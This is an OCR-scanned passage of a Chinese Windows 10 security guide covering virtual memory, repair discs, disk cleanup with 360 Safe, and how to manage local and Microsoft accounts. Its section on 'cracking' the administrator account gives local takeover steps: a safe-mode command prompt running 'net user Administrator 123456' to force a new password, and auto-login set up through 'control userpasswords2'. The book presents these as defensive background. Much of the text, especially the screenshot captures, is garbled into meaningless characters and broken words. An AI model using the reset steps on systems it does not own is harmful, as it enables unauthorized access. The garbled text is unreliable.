新 开 网 络 红 动 器 的 连接 (O 〇 ). 
创建 快 娃 方式 (S) 
开除 (D) 
重合 名 (M) 


尾 性 (R) 


step 图 弹出 “系统 ”对 话 框 ， 单 击 左 侧 “高 
级 系统 设置 ”链接 。 
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本 看 有 关 计算机 的 基本 信息 


step 图 打开 “系统 属性 ”对 话 框 ， 选 择 “高 
级 ”选项 卡 ， 在 其 中 单 击 “ 设 置 ”按钮 。 


人 x 


计算 员 名 配件 高级。 系 纺 异 护 运 本 
要 进行 大 多 数 更 改 ， 你 必须 人 为 管理 员 登 孙 。 
位 胎 
i 
ES 


肌 记 本 文件 
与 有 人 户 必 只 间 本 设置 


及 却 、 大 得 和 湛江 信息 


弹出 “性 能 选项 ”对 话 框 ， 进 入 “高 
级 ”选项 卡 ， 在 “虚拟 内 存 ” 栏 中 单 击 
“更 改 ” 按 钮 。 


性 过 项 x 
栅 党 效果 “高 级 。 数据 所 行 保护 
处 理 器 计划 
选择 如 何 分 配 处 理 器 资源 . 
请 吾 以 优化 性 能 : 


EP) OSRS() 


让 所 内 存 
分 页 文件 是 硬盘 上 的 一 块 区 域 , Windows 当 放 RAM 使 用 
所 有 驱动 器 总 分 页 文件 大 小 : 1280 MB 


(OO-. 


Ce | ww 


到 
号 


加 


[step 图 设置 虚拟 内 存 最 好 在 非 系统 盘 中 ， 这 
里 选择 盘 符 E:， 然 后 选中 “ 自 定义 大 小 ” 
单 选 按钮 ， 输 入 “初始 大 小 ”和 “最 大 
值 ”， 单 击 “ 设 置 ” 按 钮 。 


Er 
口 一 管 要 所 有 泪 却 可 的 分 大 文件 大 NA 
等 个 要 动 对 的 分 页 文 内 大 小 
至 a 卉 1(D) 分 页 文件 大 小 MB) 
CG 拖 和 的 系 壕 
EF 芭 辣 无 
FE 二 a 
aa Me 
@ssxxd 
Na 
最 大利 (MBJDX: 
OR 
口 天 页 文件 N) EE 
所 有 亚 动 记分 页 文件 大 小 的 避 数 
ONE 16ME 
2 1907 a 
RE 1200 MD 
可 


Step 图 弹出 “系统 属性 ”提示 框 ， 单 击 “ 确 
定 ” 按 钮 ， 重 新 启动 计算 机 后 虚拟 内 存 便 
设置 完成 。 


系统 属性 x 


从 要 全 改动 生效 ， 雪 要 重新 启动 计算 机 。 


6.7 小 试 身手 


练习 1: 制作 系统 备份 光盘 


使 用 光盘 备份 系统 是 安全 又 可 靠 的 一 十 
种 方法 ， 在 进行 系统 备份 光盘 制作 前 需要 
做 好 如 下 准备 。 

第 一 步 : 准备 空白 光盘 。 

第 二 步 : 准备 好 操作 系统 带 驱 动 的 
电脑 。 

第 三 步 : 将 光盘 插入 电脑 开始 制作 系 
统 备份 光盘 。 

准备 工作 完成 后 ， 就 可 以 制作 系统 备 
份 光盘 了 ， 具 体 的 操作 步骤 如 下 。 
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[mg 国 右 去 “开始 ”按钮 ， 在 弹出 的 快捷 茉 
单 中 选择 “控制 面板 ”菜单 项 。 


任务 管理 露 (T) 


控制 面板 (P) 


文件 资源 管理 圳 (6) 


控 索 (S) 


运行 (R) 


关机 或 注销 (U) 


桌面 (D) 


step 图 弹出 “控制 面板 ”对 话 框 ， 单 击 “ 系 
统 和 安全 ”链接 。 


国 按 抽 加权 
个 国 ， 控 制 面板 ， vi5 
调整 计算 机 的 设置 查看 方式 闫 别 
系统 和 安全 用 户 帐户 
查看 你 的 计算 册 改 志 OE 
通 吉文 件 历史 忆 录 保全 人 9 文生 从 
二 ES 外观 和 个 性 化 
甸 份 和 还 原 (Windows 7) | 更 改 主 是 
到 eH > msn 
网 络 和 Internet - 汶 时 钟 、 语 言 和 区 域 
坦 要 网 次 上 志和 任 和 坑 去 要 高 
渤 本 东芝 坦 和 共享 寺中 入 法 
7 硬件 和 再 音 页 站 日 其 、 时 间或 政 字 痪 式 
宣 看 设备 条 名 负 轻松 使 用 
Er 更 用 Window 建 以 的 冯 轩 
人 化 岗 沈 呈 示 
SS 程序 
| we 


step 国 弹出 “系统 和 安全 ”对 话 框 ， 单 击 
“备份 和 还 原 ” 链 接 。 


CE - 
个 由 ， tes 抽 上 呈 ， 玛 的 0 本本) PT 


Aa 罗 更 让 过 和 性 王 。 if 关 二 和 
水 雯 


aes OE eta erties 


es ema ep 


step 国 打开 “备份 和 还 原 ” 窗 口 ， 在 该 窗口 
的 左 侧 窗 格 中 单 击 “创建 系统 修复 光盘 ” 
链接 。 
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询 各 FEF 原 (Windows 刀 一 口 
< 个 四 Vindo “lo en 
tn 备份 或 还 原 你 的 文件 
© snes ss 
© AesRssa 丙 示 设 吾 Windows 备份。 车 (s)| 
三 
inde 3 


本 二 Fi 有 Ai 后 文件 的 将 后 (M) 


[Sep 图 弹出 “创建 系统 修复 光盘 ”对 话 框 ， 


在 其 中 选择 一 个 CD/DVD 了 驱动 器 ， 并 在 此 驱 
动 器 中 插入 空白 光盘 。 单 击 “ 创 建 光 盘 ” 
按钮 ， 开 始 刻录 系统 备份 光盘 。 


篇 创建 系统 修复 光盘 = x 


清远 摊 CD/DVD 驱动 右 ， 伏 后 检 一 张 空白 光盘 插 入 该 驱动 器 


可 以 使 用 系统 修复 光盘 启动 计算 机 。 光 盘 宁 还 包 合 Windows 系统 恢复 工具 ， 可 以 郁 助 你 替 
Windows 从 严重 异 误 中 你 复 过 来 ， 或 从 系统 缺 像 对 计算 机 进行 还 原 , 


更 动 姓 (D) 局 DVD 更 动 右 (E) 


创建 光盘 (R) 取消 


练习 2: 给 系统 盘 “瘦身 ” 

如 果 系统 盘 可 用 空间 太 小 ， 则 会 影 
响 系 统 的 正常 运行 。 下 面 就 讲解 如 何 使 用 
《360 安 全 卫士 》 的 “系统 盘 瘦身 ”功能 ， 
释放 系统 盘 空 间 。 


双击 桌面 上 的 “360 安 全 卫士 ”快捷 
图 标 ， 打 开 “360 安 全 卫士 ” 主 窗 口 ， 单 击 
窗口 右 下 角 的 “更 多 ” 超 链接 。 


step 图 进入 “全 部 工具 ”界面 ， 在 “系统 工 
具 ” 类 别 下 ， 将 光标 移 至 “系统 盘 瘦 身 ” 
图 标 上 ， 单 击 “添加 ”按钮 。 


[es] a 

© mms 

Gg a 神 = 

se 

NI 

=- es 
tim 
| [en Eas FY mesos 


Bp 图 工具 派 加 完成 后 ， 打 开 “系统 盘 六 
身 ” 工 作 界面 ， 开 始 扫 描 系 统 盘 文件 。 


PT 


系统 和 份 的 文件 
回 cemezrsr vonoa 


文 但 本 
CB =rwsnesrome naaaom 
系统 压 以 
-EE 
Fm, Faas 


a ems168 /woo0es 
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[step 园 扫描 完成 后 ， 单 击 “ 立 即 瘦 身 ” 按 
钮 ， 即 可 开始 进行 优化 。 


Bs 


i 


FETE A WES 5 0 ES 


un 1 


[tp 图 完成 后 ， 即 可 看 到 释放 的 磁盘 空间 。 
由 于 部 分 文件 需要 重启 计算 机 后 才能 生效 ， 
可 直接 单 击 “ 立 即 重启 ”按钮 重启 计算 机 。 


ETacc /#1o006n 


© im 2560, Wri 
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第 7 音 ”电脑 系统 账户 的 防护 策略 


电脑 系统 的 密码 如 同门 一 样 ， 黑 客 是 否 能 外 


攻击 用 户 的 计算 机 ， 就 要 看 电脑 系统 账户 


密码 是 否 安全 。 本 章 介绍 电脑 系统 账户 数据 的 防护 策略 ， 主 要 内 容 包 括 Windows 10 的 账 
户 类 型 、 本 地 系统 账户 的 防护 策略 、Microsoft 账 户 的 防护 策略 、 系 统 账户 数据 的 防护 策 


略 等 。 


7.1 了 解 Windows 10 的 账户 


Windows 10 操 作 系统 具有 两 种 账户 类 
,9 型 ， 一 种 是 本 地 账户 ， 另 一 种 是 Microsoft 
: 账户。 使 用 这 两 种 账户 类 型 ， 都 可 以 登录 
宫 到 操作 系统 中 。 


7.1.1 认识 本 地 账户 


在 Windows 7 及 其 之 前 的 操作 系统 中 ， 
Windows 系 统 的 安装 和 登录 只 有 一 种 以 用 户 
名 为 标识 符 的 账户 ， 这 个 账户 就 是 Adminis- 
trator 账 户 ， 这 种 账户 类 型 就 是 本 地 账户 。 
对 于 不 需要 网 络 功能 又 对 数据 安全 比较 在 
乎 的 用 户 来 说 ， 使 用 本 地 账户 登录 Windows 
10 操 作 系统 是 更 安全 的 选择 。 

另外 ， 对 于 本 地 账户 来 说 ， 用 户 可 
以 不 用 设置 登录 密码 ， 就 能 登录 系统 。 当 
然 ， 不 设置 密码 的 操作 ， 对 系统 安全 是 没 
有 保障 的 ， 因 此 ， 不 管 是 本 地 账户 ， 还 是 
Microsoft 账 户 ， 都 需要 为 账户 添加 密码 。 


7.1.2 ”认识 Microsoft 账 户 


Microsoft 账 户 是 免费 的 且 易 于 设置 的 
系统 账户 ， 用 户 可 以 使 用 自己 所 选 的 任何 
电子 邮件 地 址 完成 该 账户 的 注册 与 登记 操 
作 ， 例 如 ， 可 以 使 用 Outlook.com、Gmail 或 
Yahoo! 地 址 ， 作 为 Microsoft 账 户 。 

当 用 户 使 用 Microsoft 账 户 登 录 自 己 的 
电脑 或 设备 时 ， 可 从 Windows 应 用 商店 中 获 


取 应 用 ， 使 用 免费 云 存 储备 份 自己 的 所 有 
重要 数据 和 文件 ， 并 使 自己 的 所 有 常用 内 
容 ， 如 设备 、 照 片 、 好 友 、 游 戏 、 个 人 偏 
好 设置 、 音 乐 等 ， 保 持 更 新 和 同步 。 


7.1.3 ”本 地 账户 和 Microsoft 账 户 的 切换 


本 地 账户 和 Microsoft 账 户 的 切换 包括 
两 种 情况 ， 分 别 是 本 地 账户 切换 到 Micro- 
soft 账 户 和 Microsoft 账 户 切换 到 本 地 账户 。 


1. 本 地 账户 切换 到 Microsoft 账 户 


将 本 地 账户 切换 到 Microsoft 账 户 可 以 
轻松 获取 用 户 所 有 设备 的 所 有 内 容 ， 有 具体 
的 操作 步骤 如 下 。 

[step 轩 在 “设置 -账户 ”窗口 中 选择 “你 的 
电子 邮件 和 账户 ”选项 ， 进 入 “你 的 电子 
邮件 和 账户 ”设置 界面 。 


四 


上 
2 


站 


Step 图 单 去 “ 改 用 Microsoft 账 户 登 录 ” 超 链 
接 ， 打 开 “ 个 性 化 设置 ” 窗口， 在 其 中 输 
入 Microsoft 账 户 的 电子 邮件 账户 与 密码 。 


第 7 章 ”电脑 系统 账户 的 防护 策略 ES 


个 性 化 设置 
0 Microsoft 为 人 可 供 了 委 权 六 ， 了 条 二 
人 人 雹 守 日 大全 记 入 本 


Microsofr 有 入 庆 明 


单 击 “登录 ”按钮 ， 打 开 “ 使 用 你 的 
Microsoft 账 户 登 录 此 设备 ”对 话 框 ， 在 其 
中 输入 Windows 的 登录 密码 。 


使 用 你 的 Microsoft 帐户 登录 此 设备 


step 贺 单 击 “下 一 步 ”按钮 ， 即 可 从 本 地 账 
户 切换 到 Microsoft 账 户 来 登录 此 设备 。 


pe 


@ = 
mm 0 
i 你 的 头像 

-< 权 

ee— 


2. Microsoft 账 户 切换 到 本 地 账户 


本 地 账户 是 系统 默认 的 账户 ， 使 用 
本 地 账户 可 以 轻松 管理 电脑 的 本 地 用 户 与 
组 。 将 Microsoft 账 户 切换 到 本 地 账户 的 具 
体操 作 步 又 如 下 。 


[step 图 以 Microsoft 账 户 登 录 此 设备 后 ， 选 
择 “ 设 置 -账户 ”窗口 中 的 “你 的 电子 邮件 
和 账户 ”选项 ， 在 打开 的 设备 界面 中 单 击 
“更 改 本 地 账户 登录 ” 超 链接 。 


ce 
名 er ET 
0 
登录 运 项 hg 
EE 
I 全 人 后 信息、 地 扶 委 要 网 ,安全 机 等 
es 
ar 
ee 于 
从 的 头像 


step 贺 打开 “切换 到 本 地 账户 ”对 话 框 ， 在 
其 中 输入 Microsoft 账 户 的 登录 密码 。 


[step 图 单 击 “ 下 一 步 ”按钮 打开 “切换 到 
本 地 账户 ”对 话 框 中 ， 在 其 中 输入 本 地 账 
户 的 用 户 名 、 密 码 和 密码 提示 等 信息 。 
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step 国 单 击 “ 下 一 步 ” 按 钮 打开“ 切换 到 
本 地 账户 ”对 话 框 ， 提 示 用 户 所 有 的 操作 
即将 完成 。 


的 切换 到 本 地 帐户 


Ee] 


单 击 “ 注 销 并 完成 ”按钮 ， 即 可 将 
Microsoft 账 户 切换 到 本 地 账户 中 。 
[pe 

Em Er 
| 
ee 
NE 


网 中 ft 


7.2 ”破解 管理 员 账 户 的 方法 


在 Windows 操作 系统 中 ， 管 理 员 账户 
有 着 极 大 的 控制 权限 ， 黑 客 常常 利用 各 种 
技术 对 该 账户 进行 破解 ， 从 而 获得 电脑 的 
控制 权 。 


源 7.2.1 ”强制 清除 管理 员 账 户 密码 

在 Windows 中 提供 了 net user 命 令 ， 利 
用 该 命令 可 以 强制 修改 用 户 账户 的 密码 ， 
以 达到 进入 系统 的 目的 ， 有 具体 的 操作 步骤 
如 下 。 
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[sp 图 启动 计算 机 ， 在 出 现 开机 画面 后 按 F8 
键 ， 进 入 “Windows 高 级 选项 菜单 ”界面 ， 
在 该 界面 中 选择 “ 带 命令 行 提 示 的 安全 模 
式 ” 选 项 。 


step 园 运行 过 程 结束 后 ， 系 统 列 出 了 超级 用 
户 Administrator 和 本 地 用 户 的 选择 菜单 ， 单 
击 Administrator， 进 入 命令 行 模 式 。 

而 管理 员 ; CN\WINDOWS\Vsystem3zVmdexe 一 口 x 

Wicrosoft Windows [版 本 10. 0. 17134. 319] 

(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


C:\Users\Administrator> 


输入 命令 : net user Administrator 
123456 /add， 强 制 将 Administrator 用 户 的 口 
令 更 改 为 123456。 


而 管理 器: CWINDOWS\system32\cmd .exe - OO 


则 crosoft Windows [版 本 10. 0. 17134. 319] 
(c) 2018 icrosoft Corporation。 保 留 所 有 权利 。 


C:\Users\Administratornet user Administrator 123456 /add, 


Step 加 重新 启动 计算 机 ， 选 择 正常 模式 下 
运行 ， 即 可 用 更 改 后 的 口令 123456 登 录 
Administrator 账 户 。 


内 


Administrator 


EEE 


7.2.2 ” 绕 过 密码 自动 登录 操作 系统 


在 安装 Windows 10 操 作 系 统 前 ， 需 要 
用 户 事 先 创建 好 登录 账户 与 密码 才能 完 
成 系统 的 安装 ， 那 么 如 何 才能 绕 过 密码 
而 自动 登录 操作 系统 呢 ? 具体 的 操作 步骤 
如 下 。 
[step 图 单 击 “开始 ”按钮 ， 在 弹出 的 “开始 
屏幕 ”中 选择 “所 有 应 用 ”一 “Windows 系 
统 ” 一 “运行 ”菜单 命令 。 


画 esas 
绊 sm 
四 加 Hs 


| 


step 图 打开 “运行 ”对 话 框 ， 在“ 打开” 文 
本 框 中 输入 control userpasswords2。 


可 运行 x 


1 豆 ] Windows 梅 根据 你 所 输入 的 名 称 ， 为 你 打开 柜 应 的 程序 、 
文件 夫 、 文 档 或 Internet 资源 。 


打开 (O): | control userpasswords2 


[Eee 图 单 南 “ 确 定 ” 按 钮 ， 打 开 “ 用 户 账 
户 ” 对 话 框 ， 在 其 中 取消 勾 选 “要 使 用 本 
计算 机 ， 用 户 必须 输入 用 户 名 和 密码 ” 复 
选 框 。 

[step 园 单 去 “确定 ”按钮 ， 打 开 “ 自 动 合 
录 ” 对 话 框 ， 在 其 中 输入 本 台 计 算 机 的 用 
户 名 和 密码 信息 。 


浏览 (B)… 
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用 户 帐户 x 
FF。 


中 用 下 列表 授予 或 拒 疾 用户 访 问 你 的 计算 机 ， 还 可 以 更 改 其 密码 和 其 他 
设置 . 


口 要 使 用 本 计算 机 , 用户 必须 给 入 用 户 名 和 密码 (E) 
本 机 用 户 (U): 


[3 硬性 


Administrator 的 密码 


时 要 改 宅 码 , 按 Ctrl-Ak-Del 并 选择 更改 密码 "。 


应 用 (A) 


生动 如 录 x 


你 可 以 对 计算 机 进行 设置 ， 这 样 用 户 在 登录 时 就 不 必 纺 入 用 户 名 和 密 
三 , 为 此 ,请 在 下 面 指定 一 个 可 以 自动 登录 的 用 户 ， 


用 户 名 (U): Administratoi 
ESP): weeeee 
确认 密码 (CQ): | 


EGG 图 单 击 “ 确 定 ” 按 钮 ， 这 样 重新 启动 本 
台 计算 机 后 ， 系 统 就 可 不 用 输入 密码 而 自 
动 登录 到 操作 系统 中 了 。 


7.3 ”本 地 系统 账户 的 防护 策略 


要 想 不 被 黑客 轻而易举 地 冯 进 自己 的 
操作 系统 ， 为 操作 系统 加 密 是 最 基本 的 
防 黑 实战 。 不 加 密 的 系统 就 像 自己 的 家 开 
了 一 个 任 人 进 出 的 后 门 ， 任 何 用 户 都 可 以 
随意 打开 自己 的 系统 ， 查 看 计算 机 上 的 私 
密 文件 。 

对 本 地 账户 的 设置 主要 包括 启用 本 地 
账户 、 创 建新 用 户 、 更 改 账户 类 型 、 设 置 
账户 密码 等 ， 本 节 介绍 本 地 账户 的 设置 与 
相关 应 用 。 
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绩 浊 7.3.1 “启用 本 地 账户 


在 安装 Windows 10 操 作 系统 的 过 程 中 ， 
需要 通过 用 户 在 微软 注册 的 账户 来 激活 系 
统 ， 所 以 当 安 装 完成 以 后 ， 系 统 会 默认 用 微 
软 账 户 来 作为 系统 登录 账户 。 不 过 ， 用 户 可 
以 启用 本 地 账户 ， 这 里 以 启用 Administrator 
账户 为 例 ， 这 样 就 可 以 像 在 Windows 7 操作 
系统 一 样 ， 使 用 Administrator 账 户 登 录 Win- 
dows 10 操 作 系统 了 。 

启用 Administrator 账 户 的 具体 操作 步 
又 如 下 。 
[step 图 在 Windows 10 操 作 系统 的 桌面 中 ， 选 
中 “开始 ”按钮 ， 单 击 鼠 标 右 键 ， 在 弹出 的 
快捷 菜单 中 选择 “计算 机 管理 ”菜单 命令 。 


| 文件 资源 管理 器 (E) 


关机 或 注 钠 (U) 
点 面 (D) 
Uy 


step 图 打开 “计算 机 管理 ”窗口 ， 依 次 展开 
“本 地 用 户 和 组 ”一 “用 户 ” 选 项 ， 展 开 
本 地 用 户 列表 。 


EP - 0O x 
文件 四” 损 fA) 查 硅 IV) 帮助 (H) 
| 各 中 | 二 国 | EE 吕 | 旧 加 
| 二 计划 机 管理 本 地 ) 


名 称 
[a 

四 ES 计划 得 床 国 
中 
加 


step 图 选中 Administrator 账 户 ， 单 击 息 标 右 
键 ， 在 弹出 的 快捷 菜单 中 选择 “属性 ” 菜 
单 命令 。 
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有 于 


[step 园 打开 “Administrator 属 性 ”对 话 框 ， 
在 “常规 ”选项 卡 中 取消 勾 选 “ 账 户 已 禁 
用 ” 复 选 框 ， 然 后 单 击 “ 确 定 ” 按 钮 ， 即 
可 启用 Administrator 账 户 。 


datraser 屋宇 


各 网 。 条 至 于 本 本寺 


mn) ET 


口 w=>Es 有 由 


而 | 琴 N || 二 
[Sep 图 单 击 “ 开 始 ”按钮 ， 在 弹出 的 面板 中 
单 击 “admini” 账 户 ， 在 弹出 的 下 拉面 板 中 
可 以 看 到 已 经 启用 的 Administrator 账 户 。 


国 admini 


更 改 帐 户 设置 
锁定 
注销 


局 ”Administrator 


"or 


[step 图 选择 Administrator 账 户 进行 系统 登 
录 ， 登 录 完 成 后 ， 单 击 “ 开 始 ” 按 钮 ， 在 
弹出 的 面板 中 可 以 看 到 当前 登录 的 账户 就 
是 Administrator 账 户 。 


Administrator 从 


7.3.2 ”更 改 账户 类 型 


Windows 10 操 作 系 统 的 账户 类 型 包括 
标准 和 管理 员 两 种 类 型 ， 用 户 可 以 根据 需 
要 对 账户 的 类 型 进行 更 改 ， 有 具体 的 操作 步 
又 如 下 。 

Eee 加 单 去 “开始 ”按钮 ， 在 打开 的 面板 
中 选择 “控制 面板 ”选项 ， 打 开 “ 控 制 面 
板 ” 窗 口 。 


了 3 个 国 ， 控 可 人 ， 


调整 计算 机 有 的 设 轩 硬 看 方式 、 奖 引 ~ 


De 系统 和 安全 用 户 帐户 
计算 机 状 志 EE EE 
历 富 记录 保生 水 物 立 自 
本 


天 外 观 和 个 性 化 
dows 7) Pia 更 主题 


名 
ES > Wesses 
网 络 和 Internet 时 钟 、 语 言 和 区 域 
可 看 网 洛 状 志 和 任务 坑 渗 吉 澡 
拉 雪 隔 吉 和 共 县 于 用 昌吉 呈 和 去 
日 巩 . 2 
7 硬件 和 声音 人 
看 查看 设 备 和 打 名 机 
ET 
污 程序 
加 | xses 


step 较 单 击 “更 改 账户 类 型 ” 超 链 接 ， 打 开 
“管理 账户 ”窗口 ， 在 其 中 选择 要 更 改 类 
型 的 账户 ， 这 里 选择 “admini 本 地 账户 ”。 


中 管理 帐户 - 口 x 
《 请 ~ 个 下 < 用 户 -，， 管 理 帐户 v 局 安奈 演 制 。 /Pp 
选择 要 更 改 的 用 户 


Administrator 
只 本 
Administrator 
admini 
本 地 由 户 


第 7 章 ”电脑 系统 账户 的 防护 策略 号 


[step 图 进入 “更 改 账户 ”窗口 ， 单 击 左 侧 的 
“更 改 账户 类 型 ” 超 链 接 。 


品 更 改 帐户 - DO x 


€ 个 骂 «管理. 更改 帐 户 v 已 。 妆 素 窟 制 。 记 


更 改 admini 的 帐户 


更 改 帐 户 名 称 

人 只 admini 
更 改 帐户 类 型 二 地 帐户 
开除 帐户 

管理 其 他 帐户 


加 
[step 国 进入 “更 改 账户 类 型 ”窗口 ， 在 其 中 
选中 “标准 ” 单 选 按钮 ， 为 该 账户 选择 新 
的 账户 类 型 ， 最 后 单 击 “ 更 改 账户 类 型 ? 
按钮 ， 即 可 完成 账户 类 型 的 更 改 操作 。 
中 更 改 帐户 类 型 et 口 x 


€ 个 型 < 更 改 ，， 更 到 帐 YY 已 理 过 之 制 本 析 pn 


为 admini 选择 新 的 帐户 类 型 
admini 
加 二 


国术 人) 
标准 岂可 以 使 用 广 全 数控 件 ， 并 可 | 三 疏 不 影响 其 他 用 户 政 六 台 宣 胶 安全 性 的 系统 讼 是 . 
OPA) 
管理 喘 果 这 上 电脑 有 充 全 控制 权 。 他 们 可 以 惠 改 任何 设置 ,还 可 以 访问 存 全 在 这 台电 后 上 的 折 有 广 
人 和 全 这 


为 什么 建议 便 用 款 准 帐户 ? 


[aw |] ww 


7.3.3 ”设置 账户 密码 


对 于 添加 的 账户 ， 用 户 可 以 为 其 创口 
建 密码 ， 并 对 创建 的 密码 进行 更 改 ， 如 果 
不 需要 密码 了 ， 还 可 以 删除 账户 密码 。 下 
面 介 绍 两 种 创建 、 更 改 或 删除 账户 密码 的 
方法 。 


1. 在 “控制 面板 ”中 设置 账户 


在 “控制 面板 ”中 创建 、 更 改 和 删除 
账户 密码 的 具体 操作 步骤 如 下 。 

[En 打开 “控制 面板 ”窗口 ， 进 入 “更 改 
账户 ”窗口 ， 在 其 中 单 击 “创建 密码 ”起 
链接 。 
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中 更 改 帐户 - OO x 
< ”个 如 “ 管理 ;更改 帐户 vo a 也 
更 改 admini 的 帐户 
雪崩 各 称 

本 地 帐户 
条 户 
管理 其 他 帐户 


[step 图 进入 “创建 密码 ”窗口 ， 在 其 中 输入 
密码 与 密码 提示 信息 。 

总 他 是 到 - OO x 
< ”个 中 “ 更 改 -，， 亨 时 证 而 Y 局。 尝 控 制 哥 居 

为 admini 的 帐户 创建 一 个 谈 码 


Ee admini 
we 


你 正在 为 sdmini 创建 本 三 
如 果 执 行 该 操作 ，admini 将 天 失 网 站 或 网 结交 源 的 所 有 EFS 加 塞 文件 、 个 人 证 蔬 和 存 全 的 客 
盏 . 


如 果 室 码 包 合 大 瑟 李 母 .它们 等 办 都 必须 以 I 同 的 大 小 写 方 式 输入 
EE 
所 有 使 用 记 台 计 期 仙 的 人 者 可 以 看 见于 码 理 示 。 


[EL 


单 击 “ 创 建 密码 ”按钮 ， 返 回 到 “更 
改 账户 ”窗口 ， 在 其 中 可 以 看 到 该 账户 已 
经 添加 了 密码 保护 。 

站 更改 由 户 = 者， 所 
和 ”个 吕 < 等 理 。， 更 改 下 户 Y | 巴 。 百 本 皖 制 可 友 


更 改 admini 的 帐户 

更 xf 户 包 各 

a admini 
机 ri 户 尖 地 二 记 
六 Wa 
入 理化 兴 户 GB 


[sep 图 如 有 果 想 要 更 改 密码 ， 则 需要 在 “更 改 
账户 ”窗口 中 单 击 “ 更 改 密码 ”起 链接 ， 
打开 “更 改 密 码 ” 窗 口 ， 在 其 中 输入 新 的 
密码 与 密码 提示 信息 ， 最 后 单 击 “ 更 改 密 
码 ” 按 钮 即 可 。 
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从 下 更改 admini 的 灾 天 如 于 这 桂 化 admini 将 至 生 网 站 吉 网 将 尘 源 的 所 有 EFS 加 窟 的 立 
作 、 个 人 还 和 采信 国王 25 


] 
合 大 志 字 母 ， 它们 每 办 部 必 须 :相同 的 大 小 写 方式 过 入 . 
EEI 
所 有 英和 过 全 计 算 机 的 人 部 可 以 下 风声 码 近 示 、 


CD] 本 


[step 图 如 果 想 要 删除 密码 ， 则 需要 在 “更 改 账 
户 ” 窗 口中 单 击 “ 更 改 密码 ” 超 链接 ， 打 开 
“更 改 密码 ”窗口 ， 在 其 中 设置 密码 为 空 。 
由 二 - 0O x 

个 起 更 次. 更 交友 码 ~ | 局 | 本 实惠 面 方 


更 改 admini 的 宝 码 


odmini 
内 Bsn 
ER 


信 正 三 本 A admini 的 训 殉 .如 林 这 桂 做 .admini 皖 委 生 网 站 吕 网 阁 资 源 的 所 有 FFS 加 记 的 六 
伯 ， 个 人 十 忆 i0 耻 傅 的 玫 三 。 


] 
语 大 二 字母 它们 每 办 都 必须 相同 的 大 小 写 方式 护 入 , 


EREEE 司 ] 
所 有 交 二 这 上 计算 机 的 人 部 可 以 看 见 它 码 洗 示 。 


Step 图 单 直 “更 改 密码 ”按钮 ， 返 回 到 “更 
改 账 户 ”窗口 ， 可 以 看 到 账户 的 密码 保护 
已 取消 ， 说 明 已 经 将 账户 密码 删除 了 。 


Ee re” 
个 起 * 生理，， 更 次 帐户 ~ | 巴 。， 计 二 过 剂 面 本 
更 改 admini 的 帐户 
BE 
EL 
admini 
ppd 只 二 六 
Cc 
es 


2. 在 “设置 -账户 ”窗口 中 设置 账户 密码 
在 “设置 -账户 ”窗口 中 创建 、 更 改 和 
删除 账户 密码 的 具体 操作 步骤 如 下 。 
[sep 图 单 去 “开始 ”按钮 ， 在 弹出 的 面板 中 
选择 “设置 ”选项 。 


step 图 此 时 ， 可 看 到 打开 的 “设置 ”窗口 。 


二 一 
各 Er 
瑟 四 全 
系 缠 设备 Internet 
nt i 要 下 ， 和 印 机 。 咀 奈 Wi-F、 飞 行情 莹 、VPN 


E24 只 个 
区 号 es [3 ee | 


单 击 “ 账 户 ” 超 链接 ， 进 入 “设置 - 
账户 ”窗口 。 


四 - go x 


区 wp EE 
bd Administrator 
Ee 2 
EO 你 的 头像 
其 他 用 户 

同步 你 的 设置 


step 回 选择 “登录 选项 ”选项 ， 进 入 “登录 


选项 ”窗口 。 
区 3 en 
各 入 
密码 
em 由 th 
Rfid 
PIN 
全 69 PIN。 当 你 各 录 到 Windows 及 半身 赂 0 肛 和 
时 ,要 全 要 和 人 给 和夫 PIN 
mm 
图 片 密码 
Wd 
ead 
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[step 图 单 去 “密码 ”区 域 下 方 的 “添加 ” 按 
钮 ， 打 开 “ 创 建 密码 ”界面 ， 在 其 中 输入 
密码 与 密码 提示 信息 。 


创建 密码 


[Gee 国 单调“ 下 一 步 ” 按 钮 ， 进 入 “创建 密 
码 ” 界 面 ， 在 其 中 提示 用 户 下 次 登录 时 

请 输入 创建 的 密码 ， 单 击 “完成 ”按钮 ， 
即 可 完成 密码 的 创建 。 


如 果 想 要 更 改 密码 ， 则 需要 选择 “ 设 
置 -账户 ”窗口 中 的 “登录 选项 ”选项 ， 进 
入 “登录 选项 ”设置 界面 。 


< 到 -a x 
各 PP EE P 
FFE 

需要 登录 
因果 你 本 并 了 昌 胶 ， 则 Windows 应 同时 轨 下 作 生 新 大 条 ? 
I SR 
a 

密码 
Sone 

i 

a 

PIN 

从 ft 的 PIN， 当 各 录 到 Windows 及 兵 二 用 和 加 和 

时 ,要 入 全 要 求人 给 和 i PN， 
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step 国 单 击 “密码 ”区 域 下 方 的 “更 改 ” 按 
钮 ， 打 开 “ 更 改 密码 ”对 话 框 ， 在 其 中 输 
入 当前 密码 。 


step 国 单 击 “下 一 步 ”按钮 打开 “更 改 密 
码 ” 对 话 框 ， 在 其 中 输入 新 密码 和 密码 提 
示 信 息 。 


图 更 改 密码 


Estee 可 单 击 “ 下 一 步 ” 按 钮 ， 即 可 完成 本 
地 账户 密码 的 更 改 操作 ， 单 击 “ 完 成 ” 
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step 了 加 如 果 想 要 删除 密码 ， 则 需要 在 “更 


改 密码 ”界面 中 将 密码 与 密码 提示 设置 为 
空 ， 然 后 单 击 “ 下 一 步 ”按钮 ， 完 成 删除 


密码 操作 。 


7.3.4 设置 账户 名 称 


对 于 添加 的 本 地 账户 ， 用 户 可 以 根据 需 
要 设置 账户 的 名 称 ， 具 体 的 操作 步骤 如 下 。 
打开 “管理 账户 ”窗口 ， 选 择 要 更 改 


名 称 的 账户 。 


中 Ek 户 
© 了 - 个 驳 « 有 用户， 区 理 帐户 


选择 要 更 改 的 用 户 


Administrator 
本 地 帐户 


Administrotor 


加 admini 
本 地 帐户 
R 


- 0 x 
Y 蝇 。 搜 索 泣 制 .， 户 


进入 “更 改 账户 ” 
侧 的 “更 改 账户 名 称 ” 超 链接 。 


窗口 ， 单 击 窗口 左 


中 二 wk 户 
个 下 。 息 理 ，， 更 玫 帐 户 


责 改 admini 的 帐户 


- OO x 


局 | 搜 过 过 抽 面 全 


[Step 图 进入 “ 重 命名 账户 ”窗口 ， 在 其 中 给 


入 账户 的 新 名 称 。 


县 三 会 全 账户 
4， - 个 本 二 更 庆 - ， 妆 8- 


为 admini 的 帐户 键入 一 个 新 帐 记 各 


admini 
二 地 帐户 
EE 


[aemd 
该 名 千村 呈 二 在 骏 和 腊 志 各 开 闯 " 屏 态 上 . 


= 虽 x 


vo | Ss 


step 园 单 去 “更 改名 称 ” 按 钮 ， 即 可 完成 账 
